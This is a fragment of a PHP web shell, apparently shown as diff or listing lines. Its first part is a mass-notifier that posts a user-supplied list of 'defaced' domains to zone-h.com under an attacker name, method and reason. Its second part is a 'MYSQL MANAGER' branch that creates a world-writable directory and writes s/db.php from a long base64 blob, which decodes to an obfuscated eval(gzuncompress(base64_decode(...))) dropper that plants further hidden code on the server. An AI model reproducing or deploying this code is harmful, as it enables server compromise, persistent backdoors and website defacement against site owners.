- function ZoneH($url, $hacker, $hackmode,$reson, $site )
- {
- $k = curl_init();
- curl_setopt($k, CURLOPT_URL, $url);
- curl_setopt($k,CURLOPT_POST,true);
- curl_setopt($k, CURLOPT_POSTFIELDS,"defacer=".$hacker."&domain1=". $site."&hackmode=".$hackmode."&reason=".$reson);
- curl_setopt($k,CURLOPT_FOLLOWLOCATION, true);
- curl_setopt($k, CURLOPT_RETURNTRANSFER, true);
- $kubra = curl_exec($k);
- curl_close($k);
- return $kubra;
- }
- {
- ob_start();
- $sub = @get_loaded_extensions();
- if(!in_array("curl", $sub))
- {
- die('<center><b>[-] Curl Is Not Supported !![-]</b></center>');
- }
- $hacker = $_POST['defacer'];
- $method = $_POST['hackmode'];
- $neden = $_POST['reason'];
- $site = $_POST['domain'];
- if (empty($hacker))
- {
- die ("<center><b>[+] YOU MUST FILL THE ATTACKER NAME [+]</b></center>");
- }
- elseif($method == "--------SELECT--------")
- {
- die("<center><b>[+] YOU MUST SELECT THE METHOD [+]</b></center>");
- }
- elseif($neden == "--------SELECT--------")
- {
- die("<center><b>[+] YOU MUST SELECT THE REASON [+]</b></center>");
- }
- elseif(empty($site))
- {
- die("<center><b>[+] YOU MUST INTER THE SITES LIST [+]</b></center>");
- }
- $i = 0;
- $sites = explode("\n", $site);
- while($i < count($sites))
- {
- if(substr($sites[$i], 0, 4) != "http")
- {
- $sites[$i] = "http://".$sites[$i];
- }
- ZoneH("http://www.zone-h.com/notify/single", $hacker, $method, $neden, $sites[$i]);
- echo "Domain : ".$sites[$i]." Defaced Last Years !";
- ++$i;
- }
- echo "";
- }
- }
- ?>
- <?php
- if (isset($_GET['jak']) && ($_GET['jak'] == 'sql')) {
- echo "<center><br/><br/><nobr><b><span class='b7'>O=:[ MYSQL</span> <span class='b8'>MANAGER ]:=O</span></b></nobr><br/><br/> ";
- echo "</br></br><center><b><span class='b11'> You Can Go To : <a href='s/db.php' target='_blank'>[+] HERE [+]</a></center></span></br>";
- if (!is_dir('s')) {
- $mk = @mkdir('s', 0777);
- @fwrite($f, $c);
- $f2 = @fopen('s/db.php', 'w');
- $sml_db = "PD9waHAgZXZhbChnenVuY29tcHJlc3MoYmFzZTY0X2RlY29kZSgiZU5yTlBXdFhHN21TbjJmT21mK2c5UGltN2NFWW16eXZqWjJRUUdZNFE0QUw1TjZkeFY1djIyNURMM2EzMDkwT01CbisrOVpEcjM2WVFKTGRjK2NCTGFsVUpaV2tVbFdwSkg3NjBZL2pLQjdHL2lLSzB5QThyNzZvZFg3NjhYWGlwOE81ZHg2TWh4K1hVZW9udzNnWnBzSGNyemF4T0JvTms5U0wweW9tS25Nc0VGM2hYeTltMGNTdnVzS3RpM2t3amlPcVVTTWdncGVBWE9Pc05SQnI2cnM1QUtDSlB3MUNxSCt5UFR3K1BEd0ZMRWxLVFp0NVk4anU5eUhIM1lBZmt5QU9QVUE5SEw3YjI5OGREbXUxQnVRam5ZME5oV1R2WlBpdnZRUEdBZjlWajM0N0doNmVBQUxNcllsWG9pWGFvaWxxRmwxZFpXZnZlUGZ0NmVIeEg4T1QzYVB0NDIzNEZOMnV3QmJrNE44ZXZnZjQ4Y3hMa3FGL0hTUnBVblV4YnlXQlg0L2VRb1h6UEh2UEYyUEpxRW1RREtmTGNBeDhRcWp4OUh6NHlZdXJMdVI3bzVsUFpXa1FoVW0rS2REQnZZTjNoNEM5K3NpUC9mT2c2aXd1RmtFNGpaeTZ4bHJMTm96R0dRZGdPQXZtUWNxais5T1AweWoydmZGRjFZdGo3NmJxRG4vZGhjRndoMGVISjZmUU15OFJGUmlWajBzL1NXdmlzd0d2Nkd5R3VmUnZSTGNISDUrODJkSW4wR0FxcWxUd3VYa3JIZ0ZMaDY3T1orNVFVbFlCSGlSRGJvUkNBdTI3aFhLSlhPSG1YUDVQRWhsZmVESDBqc1p0bVU1Zk1wMEwzNXY0Y2RVWlIySHFoK242NmMzQ2I0dlV2MDQzTHRMNXJDTmt0UzVVV1gvcEVEbmh6eEsvZ0hNVW5EOTdJRTZzY2hmSzg5SGxBekZDamJzUXpqeFkwcTBINGd5U2FQM2x5MmQvWDk5MEpMZHgrZnF6S2JIN1pQZjRuN3ZIWnk0dXA1UGQvWGZ1QUNaVWFYYmJ5ajU1ZTd4M2REbzgySDYvNitKS3IrQ2NBNUV3WHdCU2xoSTA4ZVRZVFNLUVJNeGxiM3k1WE14dmtvOHpWengrTEI1VkV1K1Q3eVhUWU1ZVGFqS0NEb1ZRWlhRUkpXbGR3TWN5OFdQNldNQ3FwQThVRnZBaGU4aGxJTzVvdmFXNHFxQVZOTTJHMDFtd3FISWVsY1orc3B3Qk04WEhxblB5MitHL0JCVWx4QmxzNmlNSlVST0xxcnQxc2Rsekc5VFlJWW5WS3NpbHJRM01KV1RZYUd3S29CdDVDWDFXRFk5K096MDlHdjZHUzJ6UWNJZnZiMDcrc2QvQWJtTlZPWGp1V3psNEtRMmV0MWpNZ3JHSDBtQmpHVjZHMFZWWUNyMFRKSXNvQ1JBT0txVXByTlU1NUhlRWFsRFhiZWpHc1VqSFBreTgxSU9tdWk3a1hGMUFNYzZ1SmZUckNuSzVsMU0vSFYrb0ZTbzVvZGR6a0FDekpUUFBaRTBROUFPR3NHZzBZSm5ENTNLK0lOaXFnYTNwaGMzMHhyTW80YmtDd2paVnN4UEp5VW5UN2JxTWwzanhXUTBTVHdHbUN5TXpUODZ4WTBjem1FbStDTUxGTWhVTTR1ckY5RDBtRnhGSHhxcTlRWFo2UnRNMzM1elRDNTlHUk54RVMzSGxoYW5ZZ1Y3TUltOUNVL1FLWkdvWWhZUUpSaS9iMHN4RWhjWHFqMU9CTlllSXNPcmFkR0dLeU9sclppOWdnSG83eDRkSDRuVDd6ZjZ1MkhzbmR2OWo3K1QwUktUenhkQUx6LzBaMXdLd3Q4ZTcyNmU3RWxBWGk2cVVMR0wvOE9EWE4vdUhiOFRCNGFrNCtMQy9YOU5WOXcrM2Q4VE85dWsyQUwzZDNoZXdZY0VHTGx5bjRVMG1DZXlpRjM2T1NRM0hCYWpUd3dLNWQzdTcrenNuNG5UMytQM2VBYlJuUjd6NUE3WVRMaDErTmhMbWR1aEgwK0hRRmJzbmI3ZVBKSndyOXZjT2RoOVNuZnRReG1mVjcya2N6VTBEVlpjdHBtYkxjQnZqdGZSNjlXSXlZaWE2eXMrWGZSaGZuakJURDM1T1JFNzJaQ2NJQXFJeUFEVVhYbnFCbjFsTzMwdk1YSzlMVVlIMXoxellQZnd3Z1FKMzhFMkNoN0Vwb1poQjVteVB4LzRpWGQvM3cvUDBvaTJjQm1oelVMdGFrU0tDcE1INEloSXl3eElPZ3Y3OTZjZFhQUlFTVzdqUDlmQTNZTWJmY3grRXowV2FMdFpCYXdrK2RaMjMxdDdvcUhIdE9pczJYa1NSQnVuTTc3My9BNFQxMWdZbklEZEpiMkJVa0h1eThqaEpFSHdVVFc3cTZlVHpGREMzUld0emNTMjI0OENiMVUrOWkyanVkV2FneTYxZitNSDVCUlkvWDF4M29QRU5razljcDFnRk44anpPRnFHay9iUDArbTBNNHBpNEJyVUJzQWttZ1VUOGZQejU4ODdDMWhmSUI3YlVMOGpDV3h1U3Z3ZWFHOFdlaGk5WlJ6NHNUandyMENaZkIrRlViSUFCZnhyU0NINlVTbytNK2o2T0pwRmNmdm5VUlAvemVCN01zRi9PeEpnU3Y5MFZuUTUxMzVQZk9acTR1ZG1jOXBCZnE5UC9IRVUwNHh0QTNvL1JzWVNiUHNpK3VUSHVzSzAyU3hVUUJuTGZKbWxMUUdqSlJ1ZlJvdTIxVlhEZ2ZWUmxLYlIzQzZjVENaWmRyWHdYODJhWndEWmFzS1BaL3kvSXJmNXZjajlIZis5bTl3MEdpK1Q3MFVQL3ZHOHUrbmhvdnRPNVB5LzQ3K3J5ZUc4V2IvaVdUS0taaE9idm9DNUhINjJJY0lvbm5zemhBRTdadjU1N3NYblFkaHVhdlJOTExyWUxDdFFNL0VwRUxYWExtVVFqU1Q0MDIrM01DbW45ck0zejE4K2Y0Y29sN01HeWVOWllGQkxvS2RQbnhieDJkOVkvWE4rNHBKMm9GQzhlUEdpTXdVTklHM1AvR25hQWZzUHJPaWI5bWdXalM4N1Y4RUVSR25yR1RDdHc3VFhZMEtPYkVUa1d4c2t3a2lXamVOZ2tkckM3SCs4VHg3bm9reFQ5cWg0ZStHUEw3ZG5zeXF5VWRtRlZiQmRSZEJ0ZG9JdHpHN0Fqb2s3UU5LWWtUanZCR3RyQklwZ3FCZG5nTTZDZ2R6Ly9BYnB6V2d3amk4dXZSbG94U0RsRzJNa0NSdWZyTWRGS3BjM0FLdUJsV293SVdLeG55N2pVRXhnQlNDZEJ0alp1MHp5emMzZUJLRjRlOVkxenlPUFBxcndDM1dsU3RWVldXNnR3UjhOTWtTN2tPamtBWkxsQ0kxcmlSVjRTOHhENW02b3JRaDNCa0U4N3pwNk5wQTJ2QTdERmkzVDlqUzRoajZKSzFnazZ5T1EySmR0K3JrT1BlYWRpSlZFSE5tdTAybzIvK1lJWGxCZHB3bDdtVCtieVhtcjB5alZaWm9ReE96SDZEb28rRGhyMHR2QzlhSmF4aE9LcGtySDZaMTRVeCsyaDRuZjNucTF1RmdJMm9TQmwrUHBlZFZOb0hBNGgwSlFOMS8xb00rQUJsSENoaHY3MDY1akpsRmJjOWVkUmVmUVZWUlFlL3YwdWJYaDljU1hhb0VLNDAzbVFVajFWSTBOYlB0R0d1TVA1QXhyQUE5Z1V1dFprVXRiaUMrbEFjTWVTMWZKSEFkUitVcElmK24yck9ISFlaOTdsLzVGZ0w0eGxkdmhxdE1vU3FYdHkzb2VsNHUvL2hMcUU4MWcwMFdjdjQra1FZSUdzZnBFYXo4YWV6Tk1vR253U05vcUVvWStwUzMzU0Zvb3NvZytvZWpKaytaemx6eFFJMndaWm0yeGFjUnJIOW8vOFVOSEJKTXVPaEZDVUgwZFFVcWNTZklhY0ZxTzJPaTVzbGZLRHVTRzFtajlTQkpnK0RrMmpiNGswaWNxZlllcjlDVVpLODEwK2s1RjUyejArcUZEUzk2bWlOMldkdGE5U1dJZG02Uk1XeVJsVGpsSnRBc2ZTaExyMkNSbDJpSXBjMWFRUkhQem9TU2hUb1lrcDIyU25GTk9rc3pwQjVMRU9qWkptYlpJeXB3eWtsTHhmaGhOV2NrUU5SbWFxc25TWkhIZS92QkZWMVRlRThYcmwxMUhtSjVYbFlNQjVHSUV2MUt3NzZuWXJkM2xaVkJPQnVWalVDNEc3V0c0di9kcWl1NjExOU5vZ2VZU1duMTE5OHBWTmlXVTF2S3VBOWZ5Y2JsZjVlUDZmL0FjcmZBVjFRWDJTRHVNcHV3cmtubGtaUzdqR1hxVXJUTUZlZEpRZDkwNjhZZGtkZFhkZ2Zhak1Tb3V2RVFrU3pCQWswVHcrSXMwRW5vN2t0WXI0RzI0RHJBdGh0MnY2d3hITXk4RTh4QktFU2V5eDJQdTVKMVlaZzRBMFRlTW4yMTV0MmE3dEdtNGdoQm1CUXR0L2dSY1BJQ1gvZzEwQ3Qyek1LdmxWMHF1VlJvQjdaN1gxY2c5cjd6elVNZTQ1bFZDNFd3d3FnYW1rWTJTZ01wMmNwNGJySTZaTkRXNUJYVzNrK21HUkl6ZFlHUzFiMXdEOCtySHFyTjNjTEo3Zk1xZUlwNDNwREFxY2pYeHorMzlEN3NuM0VQTWNQQWd4TjFqbm9iK2xZaFJrWjZJYUtvRzNCVnRrWm5udFd4SGxndVk1bjUyUENpRk0rZjVVMmJqdHd4SW50a0kwSEM2OTJlNUdsSEY1TXJWaFI4cjcvUHpwME8wSFVBblVRM3VmUHN3ZkRqYVFkZWdOUUludTZkNld2N3J0OTFqS09SVzdPKzkzenNWTFI2SFkyWStzUlRrN1pkWWI0VHl4SmZDMkdiNkY3dFpnV3ArNmcrUjg3Q0Y3T3p1NzBLcjN4MGZ2cmViYmpmWCtRN011UThaNHNZT3RnNVZ2M3ZQU2NrWGc1UlVPOE9sT0ZxNDM3ck9rRUxXbjJub09UVzE1ZTBBS2Q1QTdHYWJ2VXFlZjdodVR2eXRHRzZvSnB1U3FGMnU2cUordmVOUFBkZ3pZSzdqcVJsay9Qcm1kendlcG1NNVNMN0IzM1Y1OUFmcEQ2ZnYxbDlpaGp3VGc2eDllVHJXS2RQanlaZUhVT1RiRSsrOTBEdjM0eFhhZk4yMlFYNzZFYmZKTVZpVFBsZ0xpNTdLMm5ramZrTk52ZTBxSEtTNTVBMEhIaGxFR2Z5Skdadk51a3ZLQ254ckhWb1N5U0QvZ0NyK0Y1SGpjSzlFenVweUdmSWptQjFmUm81emFDVnlWb3l6eUZmaWtoYUZhekNnVTFsbW9hNkhPV3hYUXdiWnJaZ3pTbDFOWW1NQnRwOGNocUs5OWVwQnZnMS9FcVM4R0tzODVIVXBYT3BDejJwMTJtU1piU2lkakc0SWZab0dNYXlSdlVSRXNRaVNzTyttWXBKZDdLK2dBNElkRlBLTW9PcHl5U3lBYVZGcjBLbzJ6Z2FvMlNrQ2NlTWtGQ2RLb0hUVEphQk9sOEJtZlJpYU1XRGhzOGlvV2tkc2VMS2trcm9yZ0JCV3NUeGxnMjZNTE1LY0tBS3RJQW9nclB6cEJ0ZUpLL1VGckZIZEFqTXdwaEU0RGdUS0d3VlJreXA1aHJIMGJUWlJqVGRiQTdObEJmelU0MldCZklIRkZ1UnFKOUdYWEEzMk9HWEZFM1hEdlkvSU11VThXM0tadXRsU0pFZ0RyTVNMc2JxWjFzRGVUNGhhUkFxbnVGWWZSN3BkdHc5cmplVDhneHV6aWkwbUgyY0RXUlRuL3FvQnlUVzBNZ2FGMEdmRFMyOTB0R3Npa25DSjdwZ25UWldHUkJDbU1LT3FtZ2FlZ0p0cFN0RldITk1Ec0Z3aTFrV3JKbjRSQ21QMmVEQmJ3NmJVTXVzZzY4bEJKU1ByYWNua2tMeTNjcVJJcjMyZnNBM1NGejZSVTR0VkJ3eVdBZ3lRTmFTelRiUFRVQ2lGQUd0TTFXbTRJbDZHSVdwSFFZZ0YzQXJJQmpXY2t0aVdodnZhS3NMdGhOV1lpK0Q4Z2dtYlJ2U0UrN1RSY2xWc0ZRL3B4NlVmMzFpaEkzanUvV2I3WlBlRVQ1SW5vOXhJUThiWkFIV2o5WFZ4d2tmTG5wZ29VM1I5WFZ2VHlMWnlRNXBJYWg5SmNnWS96clExNnc0UWV5NkxCeGRuS0o5bUYvUWY2Y05JOGcxcXd4b3hPLy9aQUpMUmd0WU83ZllKckNDcUFyWXNaZEJndWxFSW94bWVVeTJ6ZDZRWFFkTGcyc2taSlZUZHZYRGlYdzlZZU5hUW9uK0ZCeU5RdlZVelNpV3h3M0NTYlFRakxMTGF6TnRsSE9OeC9RUzZRUjBSWmU1bDA3aStTOU9BaExqYkp5ZXpsYUZ0KzZ3Q3J1aUt2NFNpZDRwbDVjVDBoa2Eweko1aHlGbDU1T0UrZXlpZXV1aTdiRzR5VHJaOENkZGZYNE1MN0xubEdIWlZuOUhoaFBwNlpHaWZTRHp3UlhnR1NxSkxWYzd5bi9EY0dFNUdlcEI1dllFRUFMSEdOaDNaRnhWWTVXb1JOdFVRSVFaZUp1ejhNaUJTMEZXODJTeTZRbzNQcnBZeHJSN2xzZWdrbXBNbllPZTlQUVZKbTdQMHlFUzNHMm1xZFhJNFRLTGhTRXZabHRCMUxjUUpwOTNnbHVFYXVVaDVQeU5YRmNid29aOXE3cWNYMGFUcllEaW5vNWNGckpEczhjaG1zL21nSXlSNU9DTEdFV1lEeVUybmQ3d01CUXBmNnNvRy9neGdmd01WVG9zMWF5bTFyVU1iZWRDeWhVbzV4aWZJZ3diTkZrZWZWVUdobzg2bitGenplYk5wamt2cGpCUFAvS2ZBbzdhM1RDTmFVQmpOa1N6OGNlRE5hSHV4NWtWOTkrQjArSThQaDZlN0orVGFWRTNvY2ZQd0NKbXA2WE5nT25RR0JyQW5XalpzbE9wbTJVMVJSeWFzN2puUzlsQXBlWDd5RCs3aVJxOTRqR1hXUW9rV1VyZG0yNFBWR2xwb21DaVRaM2dnVlRXTGhkemZlZ2tZOTZGeE9XajU0QmFjekx3YnZqM2MvL0QrNEtTd1NEaktLcnJLeVhTNThkM0xoY3pWYVMvRlQ3TWllSDZ2bXROUGluTmFMdzV6T0lyS3BGMHc2YjBML05tRVJzck94UmlpUXViQmNqWXJaUDd1M3hUeXBIdWprTDk3bmNaZU5oZG5oMUlwMGEwb3FwSjk2RlBVWVdPNHE0NHdiR3gwWGkxMkNvVXlBYUI4aU1KNUJBb1FMaHF3aW5FM0pxZ0RPa0p4S1c2azczWU0zREl0QWJNd0luQ21FMUNHTG51WEdJZlJyb1Z1S2doazRwMEF5RkFFZUJ5T2trVm5KUml3K0I1UXlxZjBaVWdhaGxWd2VrQmcxcVVqcmVSYk1kcG1tZkNXN05KNXI4bEZXZTZ1T0p6SnJCdDdNNjFaaHkxZnYwd3FjVktpUytYYnE5V3FpODJlNVVOSDFVeXExTlllTDkyQmoyUHY0ekxxbUxNaVkzMUlUQi9Zb3k2OW52ZkdjdzkvYjBiNnJOaWVWN2luTzRvbmR3WnAybHV1Mmw4WFlEZzRKUnR3N3k2VDhrdm11U1hzczBQLzlmTHRMcmxCd3grRElXRXYySUUrbnFBckdzVzl0RmdoYTJ5cW1xNDhxUGkza2s1Ym96SUJOWUw4R0tNYXlpUlRWbFhKYUNhODIrdURuck1DNmtGT2UzbG1heS9QeTdVWFptQ0pjbUtMbmkrc1hKdTl5SFdjbUhuMXJhalJaTlVWdTNOYWVkbVR5WTFDbXpMci9mdlI1NE00VGYrRFRCYm9GM3hjZFdISkNHVnFLRFhMYUVMV3hDVjlCNFhCYTMzWnJRTUwwYWhDOXVtZUJNYmxCSm82R01IR1lLQ3hNY2xGMVVIMWU5UWp4ZS9uendoL0t6RFd1YmkyaWpxcVE3TVQ5RUlTVnNsVkFCS3ErdEY0QTM3NkVVaU1VZGx1dHJXczNjV1RGaUJ4eDFrK3haZDFaTlZXbTFzTmVsMGFvYmtSVjJFVThHS2RiRkd6M25vQyt3cnBmdXdyK0lVaTR1VStWbUtqRUJPMFBTVFZGQSt3YTJFTEpVTllMVW4xb3czSS9oOFF2SUgwVU5GM2xlc2EwMGgrNVhYaTIweWtocmtXZ3ZSby84cEdDTENrZC9xeFV4ZE9QNlNmcVZPcnE3TW92T3VvZmtCdUdnZno2b3BCcThtYmtJYlFJdmJQTlNWbm83L1IvK1hzdjZyOVgvb2J0Y0V2K0dzalFJSUNmdWhxSkttdzN0eWpuV2cyZzVySTZINnk5dCtmWVJSdXEyZjlxOEZhalJPUWkwaDA5WHFGNnZsSjRVaE9GWnkxQmh4RmY1dmRPQ3Q2aHNQV3Bkbi9iVnZQU3RXYTVvYWVNeHg1QW90NW0zWkhvMjVWcGloRzJUMzYyc3daeWszcy9SbERVU3NZaDFvSnRuUWxTS3l0VVR5YVpJRzZpSUhsUTc2ZXhTaUEvd0V6RE9SUEhoRHpDb0RBMWp3Y1gxcklnT0hDQjVrWFJsZXh0K2hSTTJDYjRhRExYb1VSUTdXYWpKK2tqanNaYVNWbG16U1A1bUhoT2ttU1JHT2o5LzNibUFKYWFaTkJDNVZScXhBZUFiMlJjUkVnUEdHWEFkbXblueGxVMGpydnZ6dE1Rc0xuSWlYRTlzR09VRW9JdEtDQlFZOW1RTmhQTUJ6UGZDODBLREpLdjZ5YlUwSDlrRlZReWw0OW54V2RNcGVaZGVUWUo0T0FYV1hBVEVLcVhHZGwvc0pkZ0w3blueaZkJQUEZuOTBlODQ4OFFyMjN1QU5jS2RzOHlKSWMvbDJTTm9Mem95T3d4bTIzY0tJeEwzNXRPeVFuTWU0QWlBOXVUS2hCWUFKc1lxMnhlTEJXMXdnNTJhLytYMjgwdGx3UkhOWnljYnA5K2tENTY0c0NRNVl0TUVFbDBvM3VwTjhTVGJuVmNVdWFKbHN0U1JlbDl5V052b2JRU2E1STB1KzJISERrdnI5Rm1tbVNsVEoxalNGckFPU1M0MndHTmNiUU1kY0JkRmlMTGg3VTFxNnRzT2xKQ0xnTzdCeFplblczTkRoMmwrT1hkbzNuSDd2RUFKK2VEdldGM09IMjBrL1J2WU9ITmduTWd6cUVHV21tVmtkRjBKVUhycGxHb1ZGaTZwRENLcmxGMmptZkIrTExyNkFzVUpFR3BJVnFMelRpUmNKZklaK0l3RjcxSVppQUxaVzloYmFRK1hmNHZsTEVLblNzakVTWVB2NHdWTWVudGh1ZWdWeFR4UjdPWmw5MnRiMWM2ck5UYXNjUGdUQ1R0djVONW1CdHRheDcwTXRIeVpueDVJdkRTR3VpWm9NVHJtWHRBTng2eDdTVmpmYy9ERklNbGUySms4aDkyYW1Uait4NG5SM2w4dWRPakU1WDhOcXhseDBobExyeU1aQ3gzTHBaSndqc2hyZVgwQlVocmNXVWhWeTB3VTVXWDJwZGFvaFplRnU2MjZKek1MQ05saFdld3JuQ0Rua2FwTjVOaDRtM3RwY1A5NFk2VzBjWlVYcTczaDJLeDhRZTREYzBkOFVvOGhXMS9rNXdHZDdwZ1NjRldYZXc3RG5mUzZXZDlEVmhnSTM4SnlKOUxNRXVhOXgwVDhtOWRJV2oxSFhYOVFLMTZ1azBnVGdBYVJScmQwYzc0TXZvT3BjekZCQXdVdDFBNkRSbVozaWgvSDhJeDcwTVk0dWdMZ2hUeUVWTFBtOXlJSE4xUmFpcXdHOFc2a2hGZGhiRm5YM2JadmFiYlFXelFZK2dWaldRLzYxeHh5bUpjNnBuN0VvV0lGeHdYNldxaDZ0UFlzaSsxcm1ZcGpxOExzZk0vL0NDaitFcXVlb0VhR0UxdStJWWRYL3EyNDZoMDhCb29vd21IZ3RIZE5YZHJFbnhTM3JpUzY3dnl3blB1WnFvNkJteXBxNmQ4MzVOdVo5Sm0wZWE5b25ndDFTSHpnZSt1UTBNNnVoa2IwQTVsV3Bpb3QzRVVYUVkraGJUWEJic0E0ZmNzbUpJS2l1NE9rSm5CTlRwWXFFL25zMmdFeTdSQ0dnNjZRZFNUQm5YOU1rdUhJLzA1Um9ocnY1SVZ6bHltQjluMG1JdnIxdlF0QUVtVGY3K1N2OXU1aXBqSmlpZnNzL0tTbWZVaURQMGVIaDBlbjZJVzJoVlBuejZ4d21kQTJwZDNWM2RpamFqVzg2MzFVRkxuY3lmUjNBTWxEL05sV3dweGpPeENrbTRqUDVhZW8vRXlMdmlRK1BFU3kvMUVSaXZHWDZHZDBOUFZHVkFGVVpHSkVFMm45RFNQZUtiaXE4aVhPUGFER2RmZU1MV3RtQzVDaXNDTWt0NlpZQzlhSmNYM0hMZ3c5OXdEQTZrZWlIVWhxWnRhcW1oTlZMSWdHQ2tteVJPYUxUbWhDdlZhV0FkQk90bG1RYzBxQXN2U0dtQmdFbzhmaTlLQ3hNWnZZaW5Wa1JuVktXV0MzVC9tSjFvK1VaRTFYOXNrUlllUlN5cllkVnRPWmFaRHRjaHphSHVMenN3Wmkrd0podnAvUmJBTS9teWhrdk11aUJQV3cxeTVQZzFwSlBqMTZOMkczWWtXYkxOSTd5ajJQOW5rdEZzTitVT3pRTUQzVnBjR1FGVFUxVzZMT2VpaUNYQ3hhK3dnUElLR3l4aS91ckdJQWh0NHhwOERibVFuUHpRTmUyelVLSDhuTHExcExoMkEzS2VnTUQwbWVHUE1vaWErdnArRWc4bnNlNGxOSnU4U3R4TFl3VVh2Q0t1U3JxWkxaRkFqSVdCbXlZdnhCaVFuSldjUjZKK1lYNldSZlhYWFd5ZXNkc2gzUlhETC9LY2ZUN3pRNjd6WmZ2djdyOGVISHc1MjJ1TG5kL1JQUjc5NThoSjJ6dkozUmZCcGtlekxCSm5EVnJMenRTT0FicTluYnE0WG1nSHpHVFFpdkU3ZkZzcTlhbHZ1QzFtcURIYVRKZ1hMMmVSYjgyVTNwQmtCNlVIYTNpUFdGV3JrNG43Mk5SQWZQMm1sUlQxb3M3SGhoeE43R0RMNmpIL3RqNWNwM29tYytqcDZ3R3hRd2hTQU5GUzE5TE9GV050bFQ5UnIvQ2JvT3FKUVIraUE2bitnVTFVNkIxRUZXa1lYRUNZWC9tdzJ0TkJLSEs5TkFiZm9iaXczU2VyUFZjTXlMMCsrNWpLTlJPRUhJSG82a2QvdlljOGhaZ0x2cEMvM2JwSTQxT2xGdkN3bnFrcS9sZXpySUJsQ3pXZ1pqL0dhS21KWThFMWQ1THNUTzdWYVlSRFpuL2pvOWRTUGNITzJBQnA0MFRmR1FQZkt0TjVxYnFvenpkY0xkUS9XYU5acW1jZXNORmd6Q1BDajQzMFJLK1VsdmFDSFBYbGVPVlNNZWlicDdCSU4zeXhHU1U2LzIxaXVyNlZwekdOc0w5OHRReW5CZm55OG5kdFY5NU81RkM4b005ZW5zRXdTaEtpL3pnVjJFQUxpYnZhUzcyMmU2TVFmTGM4NUd0eFdpUFZicFBkK3ZUUkZnMWNDZ3A0Mjh1TWhMbEF2QmFXaTdERlQzUG8xbFZvZGpFbXQzQi9GRVY2SjgzV0FpMElOMjJBQ0hRd24xYVRtbXFmdFRHZnVkWFd2aTFlWjFTdFYrTTB4ODExKzNrRmZqZ0hsT2J3MFowVXlOcitxdzkzYkZKZUpOWXV4K1RVNyt1Y3R5Tmd3b2tmUUVBTmVqK1o0ZTQ3Rk43NTQ4MkFmamp1UjUvY25yR3REQXFiMmloaGZzblRDeXd4dGZVMWJSWXZUZlcwNnlTNmpteU85NHRxQWl1VlhyQXBDNmFxM1RyNzFhd1Q2R0JndklhcmJoK3JXb1Z5L0ZISjBTaStId2ZZRWRCSVdFaUdiMUYxenZ5RUx3a2QyeWNyeThTekExOGxHUWVqRk54MUhNYWl3eWpHM1pEcXBoMVVmVitpM2RmZGVIVTF3dnYzQ3E1Q1o3S2ZseThyeWVCK3p6eXFYQS92SjFrODFXNDBYRWp2d0VkOFp0dEZMckhUeUhpejBtUjFEWkZVVHlpdnBqbjFRSnlVd28xYXY4NVhGS1NuQVRnYk9QdjZYUi80Yys0TTh2a2NWZ2VmMURydWwrT2M5Sy9iVGZNVTdrQ2lHeUt5Q3dFVkhseTMwUnVkalcyWkRjbTN0YjV2ZGJwT3VIT09UUDZRSjRpdGtaZElIMXNrUmlQZHFoUlZXZWt4Q1ZNTG9pcDVOMERFdE1vUENRQm95OUVQbkNhdXkxTTVOMllxbm5qV0p6bXJvalkweWFJcFdrU0VxTXJzdTFzR1N4VmVrTm9wdGs1LzRrblIyeXNtQ2NxWjhXREJiYkU3UVJrZ25nWHBUS1hhRnpoVGwrUmpEYXg4dyt4RTJDWmM4TFdPSU15eGFidzNxbWZTbWVpYTFzbHpJemdSem02NUVMM3Rtb0ZZeGtRSHNTY1k1NVJ6QTU1NHFuN3pZT0VkMDBJajlnTFVHVWIxVVVGM1J0Ri9sY2c4aU54c3Rhd0JiR2NBLy9DUjdpOXpTYTZDQ3BSQmtHd3pmb0RFc3d3UFZZTFVvcGg0aWVnU0U4aXFoQnFmRmdvUnhyY2lXTWdXTEJzWmVxWWdtME5qSnZ3ZHBzTGRHY2M4MUdtT0Z0aXJMZy9SSXFaSzhONUZEbEZIWjdXeDJMSkZheldpUnFKUGJvSzB5L214bXBuZXpJRGsrbXRaTG1HSjdDcFhJZ1h1RGFwMDg1STU5WDI1aFZGQ29ZQjBQMDhtdzNHNHBnZTZMNW9zbkw1NjJYbTdLTngza29USTVaQ1hRaGdVa2ZvRUV6Q1BNYTRvR1dObS9qdXhwWk9GOSt2TFppK2QzSWlXSUlzYjNxekIrb1kxbHJmdDlsSHUvVngzNzAyK0VlSE9UeXZsdEpqWVdLa2FTUTE4Yy9YYjBuOEZDUHFCWHdkTk1EcUZSWE9aeVVLS0N1UGFERk5LdkN3YlArWi9qYUw2STZhVUdBa08vQmxUaEpUeSttdWhRY0tNZElNYWFvUGR2OE9veGhTd0VNU3BjMENYMTRDeVdkT2tzVmF6M3hLOSsrZzR5OXlHVDYzYzJOdGJXMThUNitzK1BmMjYxbWkwNytFY2pKbDJqMjBOTlEyZWVEYnBLdEgrcXEvZGdFZU5heTRyeHF6N3k1NHRVdGZYeDQrcWpYUE1oSy9NNk0yWFdRTStDRDlsQzdvL0tZcllvWnNqcHF4cFY2elZybjFmMVFEK3ZiZFFzZXByWkZGQnMxcFFmTXdTRFNKZ2lrTXV4bTFNYzJOaERvRW1kRHBod2J0allPdW9KSklLNWMvd0tiNUpuM2dKWG8rZE5KdStveGJJUmRaR0J1eldSM09zOW1JZ1VHaUtyVWs4UnFNREcyNnlva3R4ZUtab0tNd2lmZzBxOU5CaURabWk2cUlmUHVwbUVHeDd5TlZ1bUxrelFFUjBzWFI4UGN4RGdvcVlsRXBZOTZvSTZRd2FMU2pWY0hyQXVJaE80dHphNHNDTWZ2ZU5Xb0kwdW1aSnBQSm5qRlE4bWNtV3F1VWZqcGVnWEZIblAzbXhvdmVPNUtkaU1ndjZ4NDQ2b2RBenJBaHRSWG9xdldtdUlybkQ2MTgrYS9ldW5vLzUxOHhuOC94eitiOXIvTzZwaU5Kc01wVnRieU5nbmE0U1dZWEM5dVJNbHAyZzhWekFsemVhbWRQRkRTbW43ZGprQnZFSnhnNmZqb0xxMjliZUdNdGZTRkpJejl3WSszQUVlVWZ6OVpaNkVMcVdHSWtBbld6ekhRM0xKbmxhK2JPTGQ2S3E1c2d2WWJoTXFWTEZmVnIwZ1hLTGtIcFNVc1gxdnltN0Z4b1pBajE0d05WcElXZmZXWmZlMnRzVG1zNXI0SzhzRDdnYVd0WXBsM0Ewb2JNR205OWRQUDFiTE9vTEZKWFYxVjZDOFNOYjBwdGNUcmVJT3J3VUdUbE5VZjltTXo4NEhLWHRXYXY5S0NrMWt0UW1vVS81MVZTNnA3R3lqT2NKMzlQMXJxdkFEL3RHV2F4YzJWRVp3OW54Z3ZsOE1mdnF4a1N0L2FwVS9LeW5mdE1xZmxKUTNy